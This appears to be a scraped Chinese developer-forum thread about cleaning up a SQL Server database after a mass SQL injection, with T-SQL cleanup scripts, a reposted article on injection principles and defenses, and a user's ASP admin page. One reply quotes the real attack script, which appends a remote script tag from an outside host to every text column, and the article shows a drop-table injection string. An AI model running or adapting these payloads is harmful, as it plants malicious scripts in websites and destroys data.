调试易

怎么回事要看你涉及到这个表的ASP程序

http://topic.csdn.net/u/20090729/14/26381958-0d6e-4b90-bc90-d275e9621f93.html

数据库被注入攻击   所有文本型字下段数据都被加了     <script_src=http://ucmal.com/0.js> </script> 
怎么删掉？
--sql 2000解决方法
DECLARE @fieldtype sysname
SET @fieldtype='varchar'--删除处理
DECLARE hCForEach CURSOR GLOBAL
FOR
SELECT N'update '+QUOTENAME(o.name)
    +N' set  '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script_src=http://ucmal.com/0.js> </script>'','''')'
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id 
    AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
    AND c.xusertype=t.xusertype
    AND t.name=@fieldtype
EXEC sp_MSforeach_Worker @command1=N'?'
--sql 2005 解决方法
declare  @t  varchar(255),@c  varchar(255)  
declare  table_cursor  cursor  for  
select  a.name,b.name  from  sysobjects  a,syscolumns  b  
where  a.iD=b.iD  AnD  a.xtype='u'  
AnD  (b.xtype=99  or  b.xtype=35  or  b.xtype=231  or  b.xtype=167)  
declare @str varchar(500)
--这里是你要替换的字符
set @str='<script_src=http://ucmal.com/0.js> </script>'
open  table_cursor  fetch  next  from  table_cursor  
into  @t,@c  while(@@fetch_status=0)  
begin      
    exec('update  [' + @t + ']  set  [' + @c + ']=replace(cast([' + @c + '] as varchar(8000)),'''+@str+''','''')')      
    fetch  next  from  table_cursor  into  @t,@c  
end  
close  table_cursor  deallocate  table_cursor; 

SQL注入专题
http://topic.csdn.net/u/20081205/09/3dd06076-bcbe-45d4-998c-8999fdbe6fae.html

需要仔细检查 iis 日志，找到注入点，这样才可以有针对性堵住漏洞。
关于如何通过 iis 日志找到注入点，网上搜索一下都可以找到。不过检查 iis 日志需要耐心和技巧。

http://topic.csdn.net/u/20091013/15/9f058df7-4d29-47bf-a338-b63fcab2abc0.html
参考里面的注入专题

SQL注入攻击的危害性很大。在讲解其防止办法之前，数据库管理员有必要先了解一下其攻击的原理。这有利于管理员采取有针对性的防治措施。　　一、 SQL注入攻击的简单示例。　　statement := "SELECT * FROM Users WHERE Value= " + a_variable + "　　上面这条语句是很普通的一条SQL语句，他主要实现的功能就是让用户输入一个员工编号然后查询处这个员工的信息。但是若这条语句被不法攻击者改装过后，就可能成为破坏数据的黑手。如攻击者在输入变量的时候，输入以下内容SA001’;drop table c_order--。那么以上这条SQL语句在执行的时候就变为了SELECT * FROM Users WHERE Value= ‘SA001’;drop table c_order--。　　这条语句是什么意思呢?‘SA001’后面的分号表示一个查询的结束和另一条语句的开始。c_order后面的双连字符 指示当前行余下的部分只是一个注释，应该忽略。如果修改后的代码语法正确，则服务器将执行该代码。系统在处理这条语句时，将首先执行查询语句，查到用户编号为SA001 的用户信息。然后，数据将删除表C_ORDER(如果没有其他主键等相关约束，则删除操作就会成功)。只要注入的SQL代码语法正确，便无法采用编程方式来检测篡改。因此，必须验证所有用户输入，并仔细检查在您所用的服务器中执行构造 SQL命令的代码。　　二、 SQL注入攻击原理。　　可见SQL注入攻击的危害性很大。在讲解其防止办法之前，数据库管理员有必要先了解一下其攻击的原理。这有利于管理员采取有针对性的防治措施。　　SQL注入是目前比较常见的针对数据库的一种攻击方式。在这种攻击方式中，攻击者会将一些恶意代码插入到字符串中。然后会通过各种手段将该字符串传递到SQLServer数据库的实例中进行分析和执行。只要这个恶意代码符合SQL语句的规则，则在代码编译与执行的时候，就不会被系统所发现。　　SQL注入式攻击的主要形式有两种。一是直接将代码插入到与SQL命令串联在一起并使得其以执行的用户输入变量。上面笔者举的例子就是采用了这种方法。由于其直接与SQL语句捆绑，故也被称为直接注入式攻击法。二是一种间接的攻击方法，它将恶意代码注入要在表中存储或者作为原书据存储的字符串。在存储的字符串中会连接到一个动态的SQL命令中，以执行一些恶意的SQL代码。　　注入过程的工作方式是提前终止文本字符串，然后追加一个新的命令。如以直接注入式攻击为例。就是在用户输入变量的时候，先用一个分号结束当前的语句。然后再插入一个恶意SQL语句即可。由于插入的命令可能在执行前追加其他字符串，因此攻击者常常用注释标记“—”来终止注入的字符串。执行时，系统会认为此后语句位注释，故后续的文本将被忽略，不背编译与执行。　　三、 SQL注入式攻击的防治。　　既然SQL注入式攻击的危害这么大，那么该如何来防治呢?下面这些建议或许对数据库管理员防治SQL注入式攻击有一定的帮助。　　1、 普通用户与系统管理员用户的权限要有严格的区分。　　如果一个普通用户在使用查询语句中嵌入另一个Drop Table语句，那么是否允许执行呢?由于Drop语句关系到数据库的基本对象，故要操作这个语句用户必须有相关的权限。在权限设计中，对于终端用户，即应用软件的使用者，没有必要给他们数据库对象的建立、删除等权限。那么即使在他们使用SQL语句中带有嵌入式的恶意代码，由于其用户权限的限制，这些代码也将无法被执行。故应用程序在设计的时候，最好把系统管理员的用户与普通用户区分开来。如此可以最大限度的减少注入式攻击对数据库带来的危害。　　2、 强迫使用参数化语句。　　如果在编写SQL语句的时候，用户输入的变量不是直接嵌入到SQL语句。而是通过参数来传递这个变量的话，那么就可以有效的防治SQL注入式攻击。也就是说，用户的输入绝对不能够直接被嵌入到SQL语句中。与此相反，用户的输入的内容必须进行过滤，或者使用参数化的语句来传递用户输入的变量。参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。采用这种措施，可以杜绝大部分的SQL注入式攻击。不过可惜的是，现在支持参数化语句的数据库引擎并不多。不过数据库工程师在开发产品的时候要尽量采用参数化语句。　　3、 加强对用户输入的验证。　　总体来说，防治SQL注入式攻击可以采用两种方法，一是加强对用户输入内容的检查与验证;二是强迫使用参数化语句来传递用户输入的内容。在SQLServer数据库中，有比较多的用户输入内容验证工具，可以帮助管理员来对付SQL注入式攻击。测试字符串变量的内容，只接受所需的值。拒绝包含二进制数据、转义序列和注释字符的输入内容。这有助于防止脚本注入，防止某些缓冲区溢出攻击。测试用户输入内容的大小和数据类型，强制执行适当的限制与转换。这即有助于防止有意造成的缓冲区溢出，对于防治注入式攻击有比较明显的效果。　　如可以使用存储过程来验证用户的输入。利用存储过程可以实现对用户输入变量的过滤，如拒绝一些特殊的符号。如以上那个恶意代码中，只要存储过程把那个分号过滤掉，那么这个恶意代码也就没有用武之地了。在执行SQL语句之前，可以通过数据库的存储过程，来拒绝接纳一些特殊的符号。在不影响数据库应用的前提下，应该让数据库拒绝包含以下字符的输入。如分号分隔符，它是SQL注入式攻击的主要帮凶。如注释分隔符。注释只有在数据设计的时候用的到。一般用户的查询语句中没有必要注释的内容，故可以直接把他拒绝掉，通常情况下这么做不会发生意外损失。把以上这些特殊符号拒绝掉，那么即使在SQL语句中嵌入了恶意代码，他们也将毫无作为。　　故始终通过测试类型、长度、格式和范围来验证用户输入，过滤用户输入的内容。这是防止SQL注入式攻击的常见并且行之有效的措施。　　4、 多多使用SQL Server数据库自带的安全参数。　　为了减少注入式攻击对于SQL Server数据库的不良影响，在SQLServer数据库专门设计了相对安全的SQL参数。在数据库设计过程中，工程师要尽量采用这些参数来杜绝恶意的SQL注入式攻击。　　如在SQL Server数据库中提供了Parameters集合。这个集合提供了类型检查和长度验证的功能。如果管理员采用了Parameters这个集合的话，则用户输入的内容将被视为字符值而不是可执行代码。即使用户输入的内容中含有可执行代码，则数据库也会过滤掉。因为此时数据库只把它当作普通的字符来处理。使用Parameters集合的另外一个优点是可以强制执行类型和长度检查，范围以外的值将触发异常。如果用户输入的值不符合指定的类型与长度约束，就会发生异常，并报告给管理员。如上面这个案例中，如果员工编号定义的数据类型为字符串型，长度为10个字符。而用户输入的内容虽然也是字符类型的数据，但是其长度达到了20个字符。则此时就会引发异常，因为用户输入的内容长度超过了数据库字段长度的限制。　　5、 多层环境如何防治SQL注入式攻击?　　在多层应用环境中，用户输入的所有数据都应该在验证之后才能被允许进入到可信区域。未通过验证过程的数据应被数据库拒绝，并向上一层返回一个错误信息。实现多层验证。对无目的的恶意用户采取的预防措施，对坚定的攻击者可能无效。更好的做法是在用户界面和所有跨信任边界的后续点上验证输入。如在客户端应用程序中验证数据可以防止简单的脚本注入。但是，如果下一层认为其输入已通过验证，则任何可以绕过客户端的恶意用户就可以不受限制地访问系统。故对于多层应用环境，在防止注入式攻击的时候，需要各层一起努力，在客户端与数据库端都要采用相应的措施来防治SQL语句的注入式攻击。　　6、 必要的情况下使用专业的漏洞扫描工具来寻找可能被攻击的点。　　使用专业的漏洞扫描工具，可以帮助管理员来寻找可能被SQL注入式攻击的点。不过漏洞扫描工具只能发现攻击点，而不能够主动起到防御SQL注入攻击的作用。当然这个工具也经常被攻击者拿来使用。如攻击者可以利用这个工具自动搜索攻击目标并实施攻击。为此在必要的情况下，企业应当投资于一些专业的漏洞扫描工具。一个完善的漏洞扫描程序不同于网络扫描程序，它专门查找数据库中的SQL注入式漏洞。最新的漏洞扫描程序可以查找最新发现的漏洞。所以凭借专业的工具，可以帮助管理员发现SQL注入式漏洞，并提醒管理员采取积极的措施来预防SQL注入式攻击。如果攻击者能够发现的SQL注入式漏洞数据库管理员都发现了并采取了积极的措施堵住漏洞，那么攻击者也就无从下手了。本文来自CSDN博客，转载请标明出处：http://blog.csdn.net/jefflam/archive/2009/06/01/4233359.aspx

我也看了我的程序，用类似于.asp?id=1 and user>0  这种方式来访问的时候，我个已经做了限定了，是不能访问的，而且ID在传入时都做了判断，不能接收非数字的字符，但仍然是另一个ntext字段被挂马，挂的时候，还保留原有的内容，在后面累加自己的木马代码。烦 死 了

治本的方法在于页面程序的处理，对表单提交和Cookie内容进行过滤处理。用杀毒软件查下是否有木马程序已经传到硬盘了。检查下哪些帐号对这个表有操作权限，有没有泄露密码。保存用户、密码等连接信息的头文件等配置文件是否有安全隐患。是否有不明的系统帐号或数据库登录。操作系统的帐号和数据库帐号，尽量改下密码。注入脚本：
DECLARE @T VARCHAR(255),@C VARCHAR(255) 
DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) 
OPEN Table_Cursor 
FETCH NEXT FROM Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0) 
BEGIN 
EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://3b3.org/c.js></script>''') 
FETCH NEXT FROM Table_Cursor INTO @T,@C 
END 
CLOSE Table_Cursor 
DEALLOCATE Table_Cursor

还是没有人能说到点子上，都是网上所公布的一般的处理办法我的页面代码
<!--#include file="../n_conn.asp"-->
<!--#include file="adminkey.asp"-->
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<table width="840" border="0" cellpadding="0" cellspacing="1" bgcolor="#A3BFEB">
<tr>
    <td height="25">&nbsp;您的位置：<a href="/n_admin/" target="_top">管理后台</a> > <%=webtitle%></td>
  </tr>
  <tr>
    <td height="25" bgcolor="#FFFFFF"><table width="838" border="0" align="center" cellspacing="1" bgcolor="#999999">
<%if len(request("m_id"))<1 then
dlm_id=0
else
dlm_id=cint(request("m_id"))
end if
Set Rs1=Server.CreateObject("Adodb.Recordset")
rs1.Open "select * from dl_mb order by dlm_id",conn,1,1
%>
      <tr>
        <td height="25" align="center" bgcolor="#DDDDDD">&nbsp;栏目设置：<a href="dlmoban.asp?webtitle=代理模版">模版帮助</a>　<%Do While Not Rs1.Eof%><%if rs1("dlm_id")-request("m_id")=0 then%>当前栏目 [ <font color="#FF0000"><b><%=rs1("m_biaoti")%></b></font> ] <%else%><a href="?m_id=<%=rs1("dlm_id")%>&webtitle=<%=rs1("m_biaoti")%>"><%=rs1("m_biaoti")%></a><%end if%>　<%
Rs1.Movenext
loop%></td>
        </tr>
<%
Rs1.close
set Rs1=nothing
%>
      <tr>
        <td height="23" align="center" bgcolor="#FFFFFF"><%if dlm_id=0 then%><table width="73%" border="0" cellspacing="20" cellpadding="0">
          <tr>
            <td style="line-height:150%"><font color="#0000FF"><b>代理模版说明：</b></font><br>
            1、新开代理商的原始模样，请在此设置。<br />
            2、每个代理商新开后，请尽快通知该代理商登陆自己的后台进行必要的设置。</td>
          </tr>
        </table><%else%>
          <table width="70%" border="0" cellspacing="0" cellpadding="0">
<%
Set Rs=Server.CreateObject("Adodb.Recordset")
rs.Open "select * from dl_mb where dlm_id="&dlm_id&"",conn,1,1
%>
<form name="myform" method=post action='save.asp?ation=editmoban&m_id=<%=rs("dlm_id")%>&webtitle=代理商模版维护成功'>
  <tr>
    <td>&nbsp;</td>
  </tr>
  <tr>
              <td>当前前维护栏目：<%=rs("m_biaoti")%>　　[ <a href="lookdlmb.asp?m_id=<%=rs("dlm_id")%>&webtitle=<%=rs("m_biaoti")%>" target="_blank">点击浏览该栏目</a> ]</td>
            </tr>
  <tr>
    <td>&nbsp;</td>
  </tr>
            <tr>
              <td><INPUT type="hidden" name="m_nr1" value="<%=rs("m_nr1")%>"><iframe id="eWebEditor1" src="/n_dls/admin/eWebEditor/ewebeditor.asp?id=m_nr1&style=s_coolblue" frameborder="0" scrolling="no" width="760" height="500"></iframe></td>
            </tr>
            <tr>
              <td>&nbsp;</td>
            </tr>
            <tr>
              <td align="center"><input type="submit" name="Submit" value="提交更改" class="input">　　<input type="reset" name="Submit2" value="重 置" class="input"></td>
            </tr>
            <tr>
              <td>&nbsp;</td>
            </tr>
</form>
<%
rs.close
set rs=nothing
%>
          </table>
          <%end if%></td>
        </tr>
    </table>
    </td>
  </tr>
</table>

看上面的代码，我只用了一个request("m_id")来接受了外来的参数，但都做了相应的处理的，而且程序中从未使用cookie